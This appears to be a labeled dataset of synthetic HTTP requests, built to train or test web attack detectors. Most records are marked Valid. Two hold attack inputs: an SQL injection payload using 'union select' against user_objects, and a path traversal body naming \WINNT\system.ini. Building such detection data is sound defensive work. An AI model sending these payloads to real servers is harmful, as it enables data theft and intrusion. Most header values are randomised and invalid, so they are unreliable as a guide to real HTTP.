If-Range: Thu, 02 Dec 04 12:10:47 CET
Max-Forwards: 6
MIME-Version: 5.1
Pragma: erricsaO=iaal
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Basic eWc0OXhybTpmcmF0OXdObw==
Range: -605203
Referer: /otuwhtt/lwlnwh.sh
TE: deflate
Trailer: Warning
User-Agent: oe37na8s/3.4.8.4.6
UA-CPU: 68000
UA-Disp: 4468,6865,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 6046x3578
Via: 6.3 www.esozayB.jpeg:16118, 7.0 www.arwdtt.jpg:5811
Transfer-Encoding: deflate
Upgrade: raaq08/7.3, xrtoui/9.6, ieiplf/5.0, lti/5.8
Warning: 774 www.dijag.css "sedtyunrietbnTe" "Sun, 26 Feb 06 01:26:33 CET"
X-Forwarded-For: 44.92.107.214
X-Serial-Number: 026884237453850145
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10799
Start - Id: 23047
class: Valid
GET /sNqLBX8F9K/Gr2Bco5k/SN6Y@mLq9/rFr/bZRzz/dhjeKIwBT.mdb? HTTP/1.1
Host: 255.43.63.103
Connection: fs2dtpmq
Accept: application/*
Accept-Charset: *;q=0.9
Accept-Encoding: gzip;q=0.3, identity;q=0.3, compress;q=0.3
Accept-Language: qdhnibt-39oet, d-9, 0w2np9-ioPex;q=0.8, ta-Yld6Oir;q=0.9, o-8tehtef
Cache-Control: no-transform
Client-ip: 235.218.136.72
Cookie: JXB4.SibetweenW=nCi;guq24QwM=2944;ridd=otxharsnesohryfnye;rtmaaihytdep5FK=400205
Cookie2: $Version="511"
Date: Sun, 02 Nov 08 18:41:25 GMT
ETag: W/"n5AlUPX6@foZc5J"
Expect: 100-continue
From: sAahmw9m@oemr3xo.uk
If-Modified-Since: Wed, 21 Jan 09 22:52:50 CET
If-Unmodified-Since: Tue, 03 Jan 06 16:54:01 GMT
If-Match: "MBrE4T@VLiwZk8mJe4H"
If-None-Match: "O7UN0KJS@ISXtwjzIXSM"
If-Range: Sun, 21 Jan 07 17:52:21 CET
Max-Forwards: 1846
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: aeTei e5umtiha=e96omtou
Authorization: NTLM cm82NjZ0ZGxoc2VBUnRyczI2enQyZ3YzbnJzZXhmZWMwY2RyT0hockhuYWQ=
Range: -41
Referer: http://yiqle.st/anuT/of2so.exe
TE: gzip;q=0.9,gzip;q=0.1
Trailer: Authorization
User-Agent: 2p3n1ya http://www.lyte5obh.com
UA-CPU: x86
UA-Disp: 8779,521,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 6076x9120
Via: 7.0 www.Ewny.htm, HTTP/3.0 www.sr5e.htm, HTTP/7.4 www.tdmuh.gif
Transfer-Encoding: gzip
Upgrade: hjG/0.3, nce65/6.8, e8Uee/4.6
Warning: 007 www.oobensO.tiff "sn6eP" 
X-Forwarded-For: 55.241.109.189
X-Serial-Number: 103102
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 23047
Start - Id: 23712
class: Valid
GET /fvVMo/rtwr0fophhwor/n.QfcY2Y6q8VRZboqeJG/0aN7WlocationtZIwe3rb/sHuIay1i/7HHPSxp_psfrh4Z/iaUPuVi@ePd/8KSwM0REg_cP5YDqO4u.shtml?Etsm2=574&dxde5qtzrtp=ixRfjySj1xl&mHstnori4ntabd=291590&hrpreees1p=sN6&mh=19778&yCtsLkwySlmyGg=520&faan5esseax=aeEDchihneeypm&5ojE9Rb7g6Enph-=1e3+sb5+Si+e&ryaafaetee=Ft%7E&rLnesHvBjeAl=i4rTEeseEonter4n HTTP/1.0
Host: www.UAlahs.cz:43184
Connection: close
Accept: */*;q=0.7
Accept-Charset: windows-1254, x-mac-arabic;q=0.1, x-mac-turkish
Accept-Encoding: compress, compress;q=0.7, gzip;q=0.1, gzip
Accept-Language: *
Cache-Control: no-cache
Client-ip: 26.208.93.197
Cookie: nBnd=6aIhgYPK;Btns8=passthruhheo;qg0QnD=leternnteva;Uarauhtlldsi=eQJE
Cookie2: $Version="51"
Date: Sun, 12 Feb 06 23:57:35 GMT
ETag: W/"VgZhKD9NhHdEZ3Nql8O"
Expect: jl0ss=mdssnhte
From: rteef@dehrxns.com
If-Modified-Since: Sat, 14 Jul 07 05:21:12 CET
If-Unmodified-Since: Thu, 17 Mar 05 20:21:04 UTC
If-Match: "MPHlK5@rDQVYawK_"
If-None-Match: "IdK4oMu50W6fCKgirU"
If-Range: Mon, 03 Dec 07 08:17:34 UTC
Max-Forwards: 5
MIME-Version: 3.3
Pragma: 8=l
Proxy-Authorization: NTLM YTJ2Y2Vtc29wdGF1bWZlaWRtaGUxZmVvc2RvdHdnYUFpcg==
Authorization: ao9t eeelTTme=35on
Range: 8-90,05-70
Referer: http://www.uerxp.it/athF/ntn0n.asp
TE: trailers
Trailer: If-None-Match
User-Agent: Mozilla/5.2 (compatible; Konqueror/4.0; Windows NT; r3twno5e; cg4ec; thec2evnn)
UA-CPU: PowerPC
UA-Disp: 188,809,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 431x276
Via: 1.9 17.86.195.76, 0.1 237.227.97.32, 0.4 13.56.211.103
Transfer-Encoding: eihw7
Upgrade: eaoo3/2.4
Warning: 169 20.110.71.138:174 "Xuulgeai2thhnsm" "Tue, 19 May 09 22:55:23 CET"
X-Forwarded-For: 20.78.164.130
X-Serial-Number: 13224
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 23712
Start - Id: 41955
class: SqlInjection
GET /lm-ABmspsit24I-/isdd/soh1l40nocbynr7yd2/ej8@qWQRA.Z.a2-7/badEg10y4hEK/xYOsedekacdnisbIima.tiff?resiiTeales2h=87&rnraLntetaC=%3B+exec++++get_cust%28+%27x%27%27++union+++++select+object_name%2Cobject_type%2C%27%27x%27%27+from+++++user_objects++++where+%27%27awre%27%27+%3D+%27%27+%27++%29%3B HTTP/1.1
Host: 137.161.206.224
Connection: nAry6
Accept: image/jpeg, application/*;q=0.1, image/png
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 4tdCrneC-umrtie;q=0.4, isi-xodeic;q=0.6, ld-a;q=0.5
Cache-Control: only-if-cached
Client-ip: 54.102.14.216
Cookie: 9XcBVs@=ebisbaof;7i5ti=scriptarthd
Cookie2: $Version="80"
Date: Sun, 06 Apr 08 21:39:10 UTC
ETag: W/"L5smUaADBs4uUok.30rh"
Expect: 2eweYa=sefI;hdtn
From: lbrsawDh@elfoa4b.fr
If-Modified-Since: Mon, 23 Aug 04 15:30:19 GMT
If-Unmodified-Since: Thu, 08 Oct 09 16:46:05 GMT
If-Match: *
If-None-Match: "lzrt-akqZh-eIEpQvG6U"
If-Range: "9r9VXT1jxARkjhw_HfrP"
Max-Forwards: 4540
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: Basic MW5lYW1OdG46YXN0bHRlbnI=
Authorization: hnhE hDht5a=uhdg0rxt
Range: 55660-
Referer: http://xzatxe.ch/4ypCeh/ehpt2nna/eOss/efaxy/usjmsa.pdf
TE: trailers
Trailer: Connection
User-Agent: Mozilla/9.7 (Windows; U; Win98 3.6; E7-En; rv:6.7.9) Gecko/99740384
UA-CPU: MIPS
UA-Disp: 4298,556,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 1383x317
Via: HTTP/1.5 www.hnd0o.html, FTP/2.4 88.227.154.124:765
Transfer-Encoding: identity
Upgrade: ep1Mri/9.9, tcn/2.5, elb8/5.8, eeNie/7.6
Warning: 494 42.216.10.168:95428 "esi7pe3nyrrtei" "Wed, 28 Apr 10 16:07:09 UTC"
X-Forwarded-For: 88.3.128.18
X-Serial-Number: 41242078999326437
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41955
Start - Id: 22976
class: Valid
GET /eW5vneerh0kChou3/p84n.@IkRrdEW/6qX.mspx?omveefhdp8ghsn=%29&l5drs=e11EA%3Fo%29&SDA7aPfxtC=4760657802&shutdownHlinkhEdJm=5&dSob8ed=kz&tx=epy8g&oes=oshooweetsnm5sbe&yga9ICmo=rBFa&ia4nnacRssae=+loO%3A0ep+%5Bs%26&0lY1Sk=s-_Q&3iAcew6xSiqo=teff&onichgrlmtf=uq-otf_H-&gGrMEEUU53N=s0faccess_log4ya3beazw%5C HTTP/1.0
Host: 79.118.55.107
Connection: close
Accept: */*
Accept-Charset: x-mac-cyrillic, iso-10646-ucs-2;q=0.8, x-mac-greek;q=0.9, x-mac-arabic;q=0.5, windows-874;q=0.1
Accept-Encoding: gzip;q=0.0, deflate, gzip
Accept-Language: *
Cache-Control: no-transform
Client-ip: 212.208.180.194
Cookie: srn7=nh7_H43s_.B;Sop8r=220589;joptgRLj8TAU7=m1buf;nwitrne1Rs8xrTx=ehsd4esf0o;8CiokoxTzcat7G=evhenf3mmwxp;sCG58ZxjR%u=4065585
Cookie2: $Version="140"
Date: Fri, 12 Mar 04 18:31:43 CET
ETag: "pJ8TeI.ilaN9XqkU_aaZ"
Expect: rEooiR
From: 0cecs@ciEoh.gov
If-Modified-Since: Sun, 04 May 08 24:38:03 CET
If-Unmodified-Since: Wed, 01 Feb 06 06:44:34 CET
If-Match: "643EI@VOJ4NjeCM"
If-None-Match: "RVKP@t3U.8EOzLPqf1X"
If-Range: "gnf5Z-K7nNziNimwGI"
Max-Forwards: 178
MIME-Version: 6.6
Pragma: u7GtOsn='uo'
Proxy-Authorization: ln8a ypus=tSve
Authorization: NTLM c295bWlmZjhlY2h4c2RsZW5lc3Z0ZWVveXdzaGNqZ2VUcmxlZTVpb255QWhpYXk=
Range: 3524-0378,9-
Referer: http://www.nu4nae.de/HHymrpu/thatwte/hh49ese/Itrma9of/3aOEf4.nsf
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/6.5 (X11; U; Open BSD i586 0.6; ss-ow; rv:9.4.3) Gecko/73946303
UA-CPU: x86
UA-Disp: 052,5191,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 5290x6765
Via: cfoddi/0.2 24.158.47.52, 2.5 78.242.140.88
Transfer-Encoding: gzip
Upgrade: bae/0.4, hee6y0/8.7, soqh/2.5, sdle8/1.8, bdseN/0.5
Warning: 069 69.252.229.9 "bicstdL" "Tue, 11 Oct 05 11:27:57 UTC"
X-Forwarded-For: 208.109.201.230
X-Serial-Number: 08954851223
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 22976
Start - Id: 16746
class: Valid
GET /2irfdtD/tsaeowuaeeEgaesSIs.php?uspniswllen=a%274ee%2By%26&rbr2e=cid&honeTGtmn=ui+eyShrcpwgetosrhr%28connect&elEbOtix=eh+a+5tn&oGWCUe_0dXx@=tzF0G_c&eeh=e3g0PD&f-VuZccmZ-=513330767&ry=tglOAqm&cjmohn4c5=umbCvEGXynhN&eeoutsnpdee=y1ZF HTTP/1.0
Host: 28.214.167.235:80
Connection: close
Accept: video/quicktime, application/rtf;q=0.7, image/*;q=0.8
Accept-Charset: isiri-3342, cp-950;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 112.245.83.68
Cookie: ecwTuASy=aeuedcrirzrRaib
Cookie2: $Version="256"
Date: Sun, 03 May 09 22:25:36 UTC
ETag: W/"K5u3WxTeMNkQ9xRSKa"
Expect: rApwuie=Hs3ndtih
From: Pipae56e@rw5qne.cz
If-Modified-Since: Mon, 25 Aug 08 09:26:05 CET
If-Unmodified-Since: Tue, 08 Apr 08 21:34:30 GMT
If-Match: "iOsu.HBCpVI7IVxdLp"
If-None-Match: *
If-Range: *
Max-Forwards: 91
MIME-Version: 1.9
Pragma: l='iind'
Proxy-Authorization: NTLM YnRyYklvcGFpcnNuZVNTbXMybXRhZWUxbzJ0ZnNlMG1odHJ3dzl1ZWVhTGNmZW54
Authorization: NTLM dGUzbmphbGtjc25sQW9udHNpdGFzNG1laUZ0bXQ1Z1NheA==
Range: 73855-,-7357
Referer: http://www.aodl.uk/Aega/kjso/eo3om2x/jers/odesebnh.mpeg
TE: trailers,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/0.7 (Machintosh; U; PPC Mac OS X 3.6; ie-4t; rv:2.2.9) Gecko/30322247
UA-CPU: PowerPC
UA-Disp: 9773,708,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 400x2875
Via: HTTP/4.3 143.175.182.225
Transfer-Encoding: identity
Upgrade: xteog9/9.3, n0ut/9.8
Warning: 082 www.cyawd.gif "ulhshseXosaHnh3a" "Wed, 29 Jun 05 18:19:58 CET"
X-Forwarded-For: 125.30.59.190
X-Serial-Number: 585140076554
----: --------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 16746
Start - Id: 19065
class: Valid
GET /nmZ7-1@aqX7EU-cF2/Gc0e/t1GpaZLx/hatugaudn7s0/nEweMzk/moc6drtuueersfm88ts/pehgc/lnnqbhtd4wtdkiieigg/m@YF0fZLD/trnUlFDZsmu/auXEle@1PRDmOxo2zA/aafb6in2lTitanoFeO.png?xeSnePde0uoysv9=0dat&eeamteoo=myb3CaNO4Rt&6e69gyodaysg=813724&to=+jtu%29&it=23Qzzbf3rlV&Cmbgssrgnsd=fs9Acet7fuio5eyo6 HTTP/1.1
Host: www.eYszennsm.com
Connection: close
Accept: text/*, image/png;q=0.9, text/*;q=0.5
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: htgNads-lllna, etn-ia;q=0.4, 8-izty;q=0.5
Cache-Control: no-store
Client-ip: 26.197.199.20
Cookie: ntifee=6194130;ehnodsbnsu==eaIn(iaexecy7+libwe61E;txeee1hatCge=m1UV07;9XMLHQJ=sieeuh;ecttOf9Alr4wb=hsVRwcmOZSJ
Cookie2: $Version="3"
Date: Thu, 04 Sep 08 14:01:30 GMT
ETag: "l0gnxgklKkU1tiMzq@PX"
Expect: dtwsiarI
From: meOreslm@oakuitLO.de
If-Modified-Since: Sat, 07 Jul 07 06:28:18 GMT
If-Unmodified-Since: Sat, 19 Aug 06 11:02:32 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 419
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: NTLM NHBwdDFldGVlaXQxbm1nb3J0SXRobnlubnRyczV0ckFobmhlYQ==
Authorization: Basic a2VtbTplcmlhc3R0
Range: 0-122,891-2377,320-202511
Referer: /engcTq.swf
TE: trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/0.6 (Windows; U; Win98 0.3; 80-gL; rv:5.3.8) Gecko/26780814
UA-CPU: MIPS
UA-Disp: 603,8155,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 323x8856
Via: ige/3.1 www.ztzatnm0.tiff:16593, sta/8.7 118.181.5.38, lEaou/2.4 243.234.203.110
Transfer-Encoding: deflate
Upgrade: Nini/5.2, 1Sitkn/4.6
Warning: 342 204.151.63.29 "ebtn0ofEoku" "Fri, 09 Oct 09 08:23:52 CET"
X-Forwarded-For: 203.182.207.188
X-Serial-Number: 594077
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19065
Start - Id: 33593
class: Valid
POST /bvuieoS6.pl? HTTP/1.0
Content-Length: 256
Content-Language: qne
Content-Encoding: compress
Content-Location: /oitjdce/oiba/vie2sh/7E9wutHn/zi4ee.asp
Content-MD5: b1M5b2Zhc2NhVXRvbmlvbw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 05 Jan 10 24:32:54 CET
Last-Modified: Thu, 28 Aug 08 05:14:41 GMT
Host: 168.37.184.211
Connection: close
Accept: video/mpeg;q=0.8, audio/*
Accept-Charset: iso-8859-8, euc-tw;q=0.7, x-mac-roman
Accept-Encoding: 
Accept-Language: sd-4bfywtlw;q=0.2, TcEtd5ui-sdt, eemt-e4eiet;q=0.5, um-jhrier
Cache-Control: max-age=01
Client-ip: 222.54.144.234
Cookie: beci=ou?;1f=oto;connectkFd=3986045;Hconnect2up04HexecKpD=dtAthqro;e4hritnt4bpz6pa=Epr
Cookie2: $Version="49"
Date: Tue, 08 May 07 13:08:33 CET
ETag: W/"N4UJhc1GS4VrAFF4tlJ"
Expect: 100-continue
If-Unmodified-Since: Fri, 30 Apr 04 01:44:05 CET
If-Match: "5rE8o5.Wx_wANoxryMt"
If-None-Match: *
If-Range: "Orl@_ovmCA62MGOy2k"
Max-Forwards: 65
MIME-Version: 8.6
Pragma: ge='Tu'
Authorization: Digest uri=/ezslta/Uruhhmte/atviwoe/HfiEn.tiff
Referer: /ryafr6h/G5Mk.sh
TE: chunked;q=0.2
User-Agent: sgoHcht3eNwrnxsofet
UA-OS: Win95
UA-Color: color16
Transfer-Encoding: identity
Upgrade: aUsdbi/6.3
Warning: 893 www.lhbahae.tiff "etmsh" "Tue, 15 Jun 04 22:14:16 CET"
X-Forwarded-For: 203.16.92.234
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~

c9hoifapd53d=eig4LdmdY8CE&QvDCxrcp0=hmTaiqOl0eta4tm&o3rei9=alupdatepassthrul<tegoo&tenplptbohiE=Ew@qsi9link(m\rcpnbti%u&1d=d_HyByXtDH&oihKr=ahetwndsenef&tapnn=te&acezSerp=5-tr  sock_streamhtacces>&positionPf_7fgroup byuGS=rsedrftfselecteeaS2tdo

End - Id: 33593
Start - Id: 21665
class: Valid
GET /ohnsiirteJbs/7qnIeFbxwlgKaeVBFFe/5isHae/BQOPw.aylRlax1r.aspx?aEtxtof27t83cm=iaIqNahiZLn4&de=tWEC3rn6HFPP&5meur6=Stnlnl&txtwnAeaw5=23&xNq0EvincludeshutdownDeI8=9214&itf0=4j8DN&m4=1nteeoyanccsock_streame0a&h8imbn=h2dexan4tmc4&eijhtdn=cacopyF&pa6Emc3c=rlzeavynhEsunump&ep=064&a8cv5eutnet4=077272189 HTTP/1.0
Host: www.8alna0rm.ch:80
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: min-fresh=5
Client-ip: 8.140.139.237
Cookie: nc2soOnsofj=155;fLelhszp=323363;vetzdetrEs=oBfY6N7rcIX;v.nSc4bmailCk@=9Htnestylexts]iWd%@includetm=;D.tjo.4sjXg2=ml5
Cookie2: $Version="3"
Date: Sun, 09 Nov 08 19:55:42 CET
ETag: W/"Z.e_-lFZcdyE6A.TJq"
Expect: 100-continue
From: ynfima@o2e6raaBs.org
If-Modified-Since: Sat, 30 Aug 08 18:03:58 GMT
If-Unmodified-Since: Wed, 28 Jan 04 12:17:08 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 22 Jul 04 23:55:48 CET
Max-Forwards: 051
MIME-Version: 6.4
Pragma: ekuOou=lnisd
Proxy-Authorization: naoa orne=tnlmssv
Authorization: Digest response="a5eBE9a2e4CAC888d792FB8EbBdcD3a8"
Range: 77769-,-314844,31-11
Referer: /ysb9G.tiff
TE: trailers,trailers
Trailer: Expect
User-Agent: 4se8t1qh/3.4.9
UA-CPU: PowerPC
UA-Disp: 4149,702,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 838x039
Via: HTTP/6.6 201.109.42.112
Transfer-Encoding: compress
Upgrade: eosD/0.5, onf/2.8, beth/1.8
Warning: 379 www.t8eyub.tiff "irbsvesno1eo" "Tue, 24 May 05 11:12:48 CET"
X-Forwarded-For: 102.122.239.98
X-Serial-Number: 5531184151712734020
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 21665
Start - Id: 30813
class: Valid
GET /rk/ernEs3nem/oxeoWM6WnE.gif?nOaofezgqd73e=satreiweeetws&r5nnaNt1gGhc=905&oalrbe9uhem5L=3&myshn8r=seeseNoleShagusle&ttpaamnsNg=536&CGg0qform5REinsert=8 HTTP/1.0
Host: 110.67.204.104
Connection: close
Accept: application/*;q=0.9, video/*;q=0.0, video/quicktime
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: ohwxfd-8tei;q=0.2
Cache-Control: max-stale
Client-ip: 231.255.69.126
Cookie: eoTyzEe=yxr4~;logL2Pc8s=HbdHp3f1betnetsb;sBselcEa=cUw6pmcn6wrxro
Cookie2: $Version="7"
Date: Wed, 04 Oct 06 17:12:18 UTC
ETag: W/"lAopf6ffXu_8U.NL6R@"
Expect: nvtnnsoe
From: atr4n8@erh1g.biz
If-Modified-Since: Sun, 14 Mar 04 20:56:40 GMT
If-Unmodified-Since: Wed, 01 Mar 06 08:19:08 GMT
If-Match: *
If-None-Match: "Ap7XveHyTXuedPeqB8i"
If-Range: Mon, 05 Mar 07 19:43:47 GMT
Max-Forwards: 593
MIME-Version: 2.2
Pragma: pnih='ahser'
Proxy-Authorization: Basic YVNlYnNjYWc6YXROSTU=
Authorization: Basic aTJhbjo4ZWxzZW9hSw==
Range: 66262-55561,-1
Referer: http://www.6hRe.be/tlgc/suETos/thi3/tn5Teh9/5e1dhN.asp
TE: trailers,trailers
Trailer: Connection
User-Agent: k@Hahs2FK http://www.IoLbem.gov
UA-CPU: PowerPC
UA-Disp: 384,8584,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 450x916
Via: HTTP/9.5 www.eoyxOW.tiff:38, 7.7 www.vo6b.html, 6.2 56.48.180.175:040
Transfer-Encoding: identity
Upgrade: q15f/6.4, ouaiqo/0.5, r3a/6.5
Warning: 313 www.hlalfjmb.js "rqeAssmteih" "Fri, 24 Mar 06 15:57:48 CET"
X-Forwarded-For: 37.25.72.3
X-Serial-Number: 23620513088799
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 30813
Start - Id: 32917
class: Valid
PUT /zbsi0/mgL.php4? HTTP/1.1
Content-Length: 188
Content-Language: pd
Content-Encoding: identity
Content-Location: http://NnSe2t.it/3eti/cilor/6ekwtn/i5ein5.jpg
Content-MD5: c29hdGx0SGFQSXRIdzFybQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 31 Oct 06 18:39:02 UTC
Last-Modified: Sat, 28 Feb 04 20:38:24 UTC
Host: 214.26.23.199:80
Connection: close
Accept: image/*, video/*, video/mpeg
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: ole-llsro
Cache-Control: no-cache
Client-ip: 192.0.88.35
Cookie: swThlmir0upDo=uJRk;mito2=tO@2n
Cookie2: $Version="8"
Date: Wed, 10 Sep 08 21:33:47 UTC
ETag: W/"dwGOLSqPDkGU5LH0r9"
Expect: 100-continue
From: Qtafer@rrotHx.be
If-Modified-Since: Thu, 26 Jul 07 14:35:04 GMT
If-Unmodified-Since: Tue, 26 Jun 07 08:07:29 UTC
If-Match: "mFMZgcV-7-bi_Or6"
If-None-Match: "x9eWrgrwCw1TJo.kxZ"
If-Range: Wed, 24 May 06 07:12:39 CET
Max-Forwards: 66
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Digest cnonce="oiAtpy"
Authorization: Digest qop=nk3lhr
Range: -4,6-6736,955975-440
Referer: http://www.emHdc.biz/u8l0.php3
TE: trailers,gzip
Trailer: Accept-Encoding
User-Agent: Mozilla/3.7 (Windows; U; WinNT 7.8; sf-dk; rv:5.3.1) Gecko/38082287
UA-CPU: 68000
UA-Disp: 523,5412,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 298x2995
Via: FTP/1.4 www.aAeetj.html, oz0/7.7 www.Rxad.js:598
Transfer-Encoding: deflate
Upgrade: jie/1.0, iaAlda/7.0
Warning: 042 55.252.234.189 "mLniet61zeaoq" "Tue, 18 Nov 08 09:37:46 UTC"
X-Forwarded-For: 96.92.231.105
X-Serial-Number: 9424795318731679930
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tailhop=rfSK@2v&oeOUDomabd=ikxkUh6uvF&kpn=ro5an&lm=a(i /e wna%Tah&rsyto3i6=24&meelyrezsitj1=r&-4FZgidVL=ss2ep&aOCaiYttrli=ty160d&cgg=neLjCbQEN&f3Ssetosci0ttbc= %TswtwherexcatsOH0

End - Id: 32917
Start - Id: 20340
class: Valid
GET /hlglebeshtrEay/Xtbmy4pUkweU39V/ceDepKv/yy/nvafAgnRryM_NIQr/2pdiraio136t2/jYBZvE21Q_lDj/tha.sh? HTTP/1.1
Host: 32.235.242.113
Connection: lstae
Accept: video/*, image/jpeg
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.2
Cache-Control: min-fresh=0973
Client-ip: 123.41.218.176
Cookie: ludEdtt7eyos=totQds;y1heb=331569551;byOK==cTps
Cookie2: $Version="1"
Date: Tue, 07 Aug 07 06:42:52 GMT
ETag: "CXJ-iSY5TW2-rp_6B2"
Expect: qarlkk
From: Mor5sfT@hrehlUsesw.gov
If-Modified-Since: Wed, 23 Sep 09 01:43:06 GMT
If-Unmodified-Since: Thu, 17 Aug 06 05:31:49 GMT
If-Match: "2q9Ua39js2vnGGMlPv"
If-None-Match: *
If-Range: Thu, 09 Sep 04 05:21:03 GMT
Max-Forwards: 773
MIME-Version: 5.5
Pragma: esta='e3h'
Proxy-Authorization: Basic Znl0ZTNlOnF1c3I=
Authorization: Digest cnonce="ctqion"
Range: -6349,-64
Referer: http://kwEEba.it/en2s/deBekaea.gif
TE: deflate,chunked
Trailer: Referer
User-Agent: Mozilla/0.1 (Windows; U; Windows NT 0.7; Vl-07; rv:3.2.5) Gecko/41951613
UA-CPU: PowerPC
UA-Disp: 945,093,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 056x355
Via: FTP/7.1 www.6itou.jpg, 4.0 219.253.125.66
Transfer-Encoding: deflate
Upgrade: sqiew/4.1, 1n55Nn/3.3, aeif/5.3, csk/5.8
Warning: 351 www.etqz.jpeg:9 "kbhesnaoaansf3tugpt" 
X-Forwarded-For: 11.244.14.65
X-Serial-Number: 11331311370992169456
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20340
Start - Id: 45404
class: PathTransversal
PUT /xRcjQISWu.M8Lf0t/aKrQ6jwbf-Wx/hdmuE2ouronxtcndrfed/e@Nj0.oJvCa/ShaoEehnildhi3i7pivu/wRCIN/wxaDoiw9crfhifsIsb/ytswualeia/cE9uy/4lxmlUS8sIJoinclude/RNadminxhC/ceehtonnn.exe? HTTP/1.0
Content-Length: 94
Content-Language: e7erahj,2a
Content-Encoding: identity
Content-Location: /uooi.avi
Content-MD5: bWZpdHRkMHJ6YW9pTGVsOA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 16 Feb 05 18:50:20 GMT
Last-Modified: Wed, 22 Mar 06 20:43:01 UTC
Host: 143.58.14.92
Connection: close
Accept: */*
Accept-Charset: x-mac-greek, x-mac-hebrew;q=0.6
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 182.249.119.41
Cookie: tntiyd5rh=gosi82y;7umto=DdGlibpswdt1%u;M8TP8.Os=bupa6;ah69tfo=0185336873;a6teeEdxdlaoSha=9798;5bnt1szthmz=3
Cookie2: $Version="269"
Date: Sun, 25 Jan 09 21:20:26 GMT
ETag: W/"-yfA6unXQjL3zd2"
Expect: tfrsm=sosgerh;sBoaj3pd=n6aTco
From: d1Subs@Oaeelb.fr
If-Modified-Since: Tue, 02 Jan 07 20:20:53 GMT
If-Unmodified-Since: Sat, 13 Nov 04 09:57:01 CET
If-Match: "Ca7G-c1Fsah1tqkn"
If-None-Match: *
If-Range: Fri, 17 Oct 08 08:28:41 CET
Max-Forwards: 3227
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: qei4S 0e1e=mede
Authorization: a4Eja aO53=lrnwidtl
Range: 50-63221
Referer: http://www.tceutefe.be/ffhwtp/haazneg/d6racO9/i9br.html
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/7.9 (Windows; U; Win 9x 2.9; o3-b0; rv:6.6.9) Gecko/17150487
UA-CPU: MIPS
UA-Disp: 7543,727,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 789x027
Via: HTTP/3.9 www.Yeosvebe.tiff
Transfer-Encoding: gzip
Upgrade: nhl/2.2, iq1t/0.4, vahc/6.4, rxeb/7.3, E6nr/6.9
Warning: 226 191.247.153.35 "oywrpbp" "Tue, 07 Jun 05 04:43:35 GMT"
X-Forwarded-For: 88.16.159.203
X-Serial-Number: 279789
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nxe3ohoy25=78755132&UcgzsyhVcrnS=6u9hhe&sAii=orhes&grh=\WINNT\system.ini&22aDo7e=eaa%Tlt

End - Id: 45404
Start - Id: 15240
class: Valid
GET /oSrq4O2tmsQ4/etirti.css?nesv8ayo=ovNhNwdII&emrdnjadhc=ssuOy&pcL=6&oancmungor=55894&ta4abYU=o9etnatbd8srrwit&RswgetMchildlibFOX=tusr&uArO=tIwOBf&OMphttps@xl=+%28acceptag&uehFb=rho&ezcstsapidlzwe=157224026&Hohi9dsfsotj=425624&syegtw0yw=hz4yGwyJCG&nirtql2a=60 HTTP/1.0
Host: www.duajne.biz
Connection: keep-alive
Accept: audio/basic, application/postscript
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 249.93.245.212
Cookie: lQdwumTbwokele=cHHspaUAHS;d2=nseh
Cookie2: $Version="112"
Date: Sat, 25 Mar 06 05:23:01 UTC
ETag: W/"u6uDu879l_lq1QfkZUh"
Expect: oerylfym=3lcly
From: rwLjhtn@hMidWa4.fr
If-Modified-Since: Fri, 20 Mar 09 17:32:01 UTC
